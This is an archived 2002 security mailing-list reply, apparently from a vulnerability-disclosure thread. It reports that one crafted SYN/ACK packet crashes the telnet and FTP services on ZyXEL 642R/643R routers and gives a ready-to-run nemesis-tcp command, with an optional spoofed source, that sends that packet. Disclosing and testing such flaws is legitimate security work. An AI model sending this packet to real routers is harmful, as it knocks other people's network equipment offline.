Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing

From: Kistler Ueli (iukat_private)
Date: Mon Jun 17 2002 - 10:47:27 PDT

  • Next message: Knud Erik Højgaard: "Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS"

     Hello
    
    there's no need to flood the router.. just send 1 single packet and it
    crashs the remote service (works on telnet and FTP, dhcp not tested... ).
    Example with nemesis:
    nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -y 23
    This will send a packet with SYN/ACK flags set to port 23 (Telnet) to
    the router (-v allows a stdout visual of current injected packet)
    
    Regards,
      Ueli Kistler
      www.eclipse.fr.fm / iukat_private
      www.packx.net / www.eclipse.fr.fm
    



    This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 16:14:14 PDT